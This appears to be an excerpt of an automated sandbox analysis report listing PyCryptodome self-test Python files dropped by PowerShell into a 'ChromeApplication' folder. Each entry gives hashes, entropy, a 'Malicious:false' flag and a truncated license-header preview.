                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_ECC_448.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15235
                                                                                                                                                                                                  Entropy (8bit):5.323832478101059
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Frskrs9VqnIKt8lvlU+h2ZerUbZttyZMkdZeU0ZpX/ZiemZEGaZp0LZ3Td7Zxmcd:Fr6qYlvlU+h20rUbvtyykd0U0HX/oemt
                                                                                                                                                                                                  MD5:017642671098D38A9921ADA7A0951DA8
                                                                                                                                                                                                  SHA1:BC9E4CE5AD8084B4738D143535069B07AE04AA2D
                                                                                                                                                                                                  SHA-256:5CBAA220B85562E5DB201B3A0C4A038053A89EADAA8D9E2E38E06EC5F5E91784
                                                                                                                                                                                                  SHA-512:7DD94737C18B9271F75387EFEC5A2EB91A9A5AEBE73B995AF5A17AC7D667B13C98CF29150DDADBEAF17F55C278207ACD8A56D9D8CE4BF428FC3006CD5AE0896A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_ECC_NIST.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (320), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52772
                                                                                                                                                                                                  Entropy (8bit):5.105714890735783
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Hr6qZFk9ZlxJd1dlN5hjlszlyvlRjlAlBXlwtrFk/lxJdPlN5h+blszlyGlRjlAT:HrpUMitfqUFJe6Qk72tf4XC5Gb
                                                                                                                                                                                                  MD5:D4E0988F7D451B2B6947B897A28EE683
                                                                                                                                                                                                  SHA1:EC447FDC1938150BA061A2694D515AE4DA2E1BC6
                                                                                                                                                                                                  SHA-256:725530571C5F6A2A7A7DBE70CA01F0D98ACF58A28A7E756AB5112264B8A1671F
                                                                                                                                                                                                  SHA-512:DABB89CDA5304D7BEEC6DE652FCBC9B4379A1D5EB2A7769D5DEF4E2BDEFB52DDE9F40662480AFD29E7D92700057893376E399A2FA85EB36E4DF9FFE9393F0639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_ElGamal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8865
                                                                                                                                                                                                  Entropy (8bit):5.359617066604544
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:vQHvtdzhCrYVFr0PYwlVkOr8DDQVtBx2WnvBGr4:ve3h5VFEflVn8nQrBx2WnvF
                                                                                                                                                                                                  MD5:72679E90B28641849BF954433CD1E65D
                                                                                                                                                                                                  SHA1:9C879DF1BEF61E45270C49FAF745FD1A3D5D01BA
                                                                                                                                                                                                  SHA-256:DE68DD99C82D04F99B7A8DC246F9AA626B97AEBB0266D237B3F97212AC9A7F2F
                                                                                                                                                                                                  SHA-512:9383D3DB45A596462A3FD7F9AF9723AD451D0CA7CE2BEBB8C9364021623E5E85E505D9AD565C20BCB894A2FBBAF90566E947E044FC8C36A540C4F9BFAB0EBD48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_ElGamal.py: Self-test for the ElGamal primitive..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_RSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12948
                                                                                                                                                                                                  Entropy (8bit):4.976023341221772
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:6wfFQHvo+oyHFCV2pK05i81ILA5204WVTHM8xTH8HS3z8Wdy8Lqe8ITy8By58GFu:6wdQHvtCV2Q0PSM56QTHgX+2BP8trZ
                                                                                                                                                                                                  MD5:32E053A4827566EF922022D85F245E73
                                                                                                                                                                                                  SHA1:6B0B7C6A5A55846EEF14E5B8E57EEBCFE79CA333
                                                                                                                                                                                                  SHA-256:C21A130AFCC95FE9C7399B96843457360412E2AF6F880502B9DA6961CFF05DD1
                                                                                                                                                                                                  SHA-512:2D1651C9DCF4063F7334BE051EBE23F792F08B4009F11A551D4B810C38DF4778CBFDA030B3F7039DB72F7598BBB90760D694172BC33660FB259F759E24903AB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_RSA.py: Self-test for the RSA primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_import_DSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (606), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26063
                                                                                                                                                                                                  Entropy (8bit):5.815765795492079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OezqZSzvQgHHDsgPscoAeefBA7AACWzIOgrKF5ut4TiEhL6v:Fz9hHHDHsc3RaodKnutKhLs
                                                                                                                                                                                                  MD5:1F7E668CD0A3C46EC31C5CA5CBAD6BE2
                                                                                                                                                                                                  SHA1:530E5492A65FC6D0202FF2E734C1FCE0E03086D8
                                                                                                                                                                                                  SHA-256:AE72FF476A6EDF11F5C87833E61C3FA22B636FFD9A40BBA216DBE4EAAF375734
                                                                                                                                                                                                  SHA-512:31D17F6A4C7F9E6813F8C265D81EBF6D84B92494B037DA6CA341178FFD30671B8197349006A6E8D2E470143324CC6187391179639B9DC5C31904308E5BF49BAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_import_DSA.py: Self-test for importing DSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_import_ECC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110530
                                                                                                                                                                                                  Entropy (8bit):4.785476957080907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:HrxUZpU2MELKo95NgqKrXXPbu26KbkksYR29NnDT:6
                                                                                                                                                                                                  MD5:9AFABC2CBEE27CA96CFF6E39B6A71F59
                                                                                                                                                                                                  SHA1:D7FC53777C2E19578D912DFAEB264B75075D6ED4
                                                                                                                                                                                                  SHA-256:6D1D11ACC8627531DA1004DA3C769145C86132D3BCFC534C2C95316461F32483
                                                                                                                                                                                                  SHA-512:5F577A3D5AD96CEBF411E6F8B85A76D26D709A8A0233344C9F2C6D429E9F304E1085FAD8D2A50729521B52743F01CA3C5036CE824FF9C2A8F9A6B9DD099A0689
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_import_RSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27335
                                                                                                                                                                                                  Entropy (8bit):5.573317920900425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gee1Bv3eFHNXizsjs3FXiRZ3BnZ2+89emGHT2UoAsv0pv0Mvmg8Dab5DXTWHX/Ng:7e1xizNk+8QwlEdYdtdGd/
                                                                                                                                                                                                  MD5:F1E726C8D26E5A4EDD4F0E86D08A2DB4
                                                                                                                                                                                                  SHA1:882F48AD94D4650DF3EB8277B7ACB5559FA3FB0A
                                                                                                                                                                                                  SHA-256:4E24EC277328732141035B87E859DC566C037F7E41B64385E7C52342A85708BE
                                                                                                                                                                                                  SHA-512:077403C7FA352D037DF498DA84907A9F3245D5145000C58EA25FD848CB80999D52B10BA63F84AA6101136878FECBF8919F00E0BC8D4545C8972734F19F186E3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_importKey.py: Self-test for importing RSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Random\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1581
                                                                                                                                                                                                  Entropy (8bit):5.226736646167872
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lc+4470Gvw5hXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Fl7SP8ryGN:N4GHwEIB0jcQHMsvI/S3oCFhS01raZa
                                                                                                                                                                                                  MD5:650B195DB914D00543FFC6282AEF4386
                                                                                                                                                                                                  SHA1:C12250DA69C867BF14B63D2B991A21D062C88241
                                                                                                                                                                                                  SHA-256:468CD14E0B72874B146C15413D0AA19B9D1CECE91D74924F5B746142CE14EE41
                                                                                                                                                                                                  SHA-512:4168A13930D6011BECBE65B9862B4146C65D8F3CE38CEEB6CC3AA57E332B8D08D2463FA3ABE285CF77AF706D75810FBD255D9FBDE3D57BC222A377F5C00C90D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Random/__init__.py: Self-test for random number generation modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Random\test_random.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7157
                                                                                                                                                                                                  Entropy (8bit):4.828342299384293
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nwdQHvwJya+isH+rAx7iX4DRyckzfYLyWENIX1dZ:nUewJya+isMAx7ioDRyLbiREWX9
                                                                                                                                                                                                  MD5:BC110BB6E2A2F78799CBA2E4A078B348
                                                                                                                                                                                                  SHA1:5EA96E99799846814665A161C23E80946B11EBD3
                                                                                                                                                                                                  SHA-256:8A94FE4391E4615B8FB5F4115830BD8ADDABB05CEF1E8F74F7BB9AE5F8E367F7
                                                                                                                                                                                                  SHA-512:96C5E94B3304520F626F031269CBB4BB6EB81DC57E00020865B0FBDEDBF0EBD8F3C21FF51B2BC2B737192FCA0A7E3922AC88F1D6473A4061C14D5B22DCF96D2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_generic.py: Self-test for the Crypto.Random.new() function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Signature\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1599
                                                                                                                                                                                                  Entropy (8bit):5.165215017196936
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lc+J2w8yXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Flw8ZB6uadPOy4:NpEIB0jcQHMsvI/S3oCFOOBzwQOaT
                                                                                                                                                                                                  MD5:083FC5F35EE0DF1EC53ECAC2C412FC84
                                                                                                                                                                                                  SHA1:354D57E8536552067A110B7BAB4DF8EE920528B1
                                                                                                                                                                                                  SHA-256:EE9D77A0F03E91170605EE5BBC1FDD351030504B68840E5D1AC87C688B2BDAED
                                                                                                                                                                                                  SHA-512:F03AC26A5574C2BC8F22A6FB6AAB894E1B757F58B95DF2391DC336CFBE7AB3BEFB0DAA8A8CB12135D0B42C3C225EBDC0F2BA98586F1F73744150372E6D77C9D8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Signature/__init__.py: Self-test for signature modules..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Signature\test_dss.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58459
                                                                                                                                                                                                  Entropy (8bit):5.033274153315109
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1r6q7FYGlGFjUYy2ItfrukaJx5jsZ/iNj+rYEZRlAjfbc:1rpjj2ySkaRjtNKrYO3
                                                                                                                                                                                                  MD5:DB184380CEA1F11904E6D14175913500
                                                                                                                                                                                                  SHA1:59480F2DBD08D734AC553B4D37CB6743DB5204E6
                                                                                                                                                                                                  SHA-256:D4C77C4DE539C4759000188159D73E22EED3997DC31D9244A6AAD476437D95BD
                                                                                                                                                                                                  SHA-512:2ADED52FF8E77B12FFDCA180072C7D3B73087C4BEF145A4167D12D8026AD32851EB6763627BE31D8F61361B51DB07654146CDD56B30AA611CF07C4DF89037ECA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Signature/test_dss.py: Self-test for DSS signatures..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Signature\test_eddsa.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24708
                                                                                                                                                                                                  Entropy (8bit):4.928631305766138
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6rskrs9VqV5QJGc/S6WOYs06PDk2Q6tE1yGWEFUtce47VIUbB:6r6q7qG+WO26TzGoVG7VNB
                                                                                                                                                                                                  MD5:885594421BDB74CB41BD212B07F2FE31
                                                                                                                                                                                                  SHA1:07853D9DF97033A47A5CA0290A7D23AD67DB6E62
                                                                                                                                                                                                  SHA-256:C9FF4BA5715303422A5E828AC80B8868C893255BD832C428F2DD369A169CA8FD
                                                                                                                                                                                                  SHA-512:12662D64C764654AE7066C87D632050D53507FF39778FEE3F6D5F4C6805EEDDC6C3267978FFD91E210887AF874C418C57D17756B983D73D47D132F4DD7E6D639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUEN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Signature\test_pkcs1_15.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13889
                                                                                                                                                                                                  Entropy (8bit):5.0841198388491415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IWGRc3Wgxxu1ndXxjTVXHYjBTetB4H/UObo5FrrQyEReRBRj6Dcr:0rskrs9Vqw2xxu1nvvZKcwjNW
                                                                                                                                                                                                  MD5:093398DDA0E59A51C5BF120896ECAF48
                                                                                                                                                                                                  SHA1:7BB7CBCEEAC65543DE8C869443335448261DFCF8
                                                                                                                                                                                                  SHA-256:30EF738E57068C05379B9E12B435A777B3FC0010935DE6BEFD01FA4C8C0C33E8
                                                                                                                                                                                                  SHA-512:59AB1A3CC7C0176991B062FFEA818A61D7D670DAF1C6CBC9C37CCD914785C53B7FC17A90D605306E55C744B59E8A5F7D643AB1935F23B86F317F1DD823FBFBAC
                                                                                                                                                                                                  Malicious:false
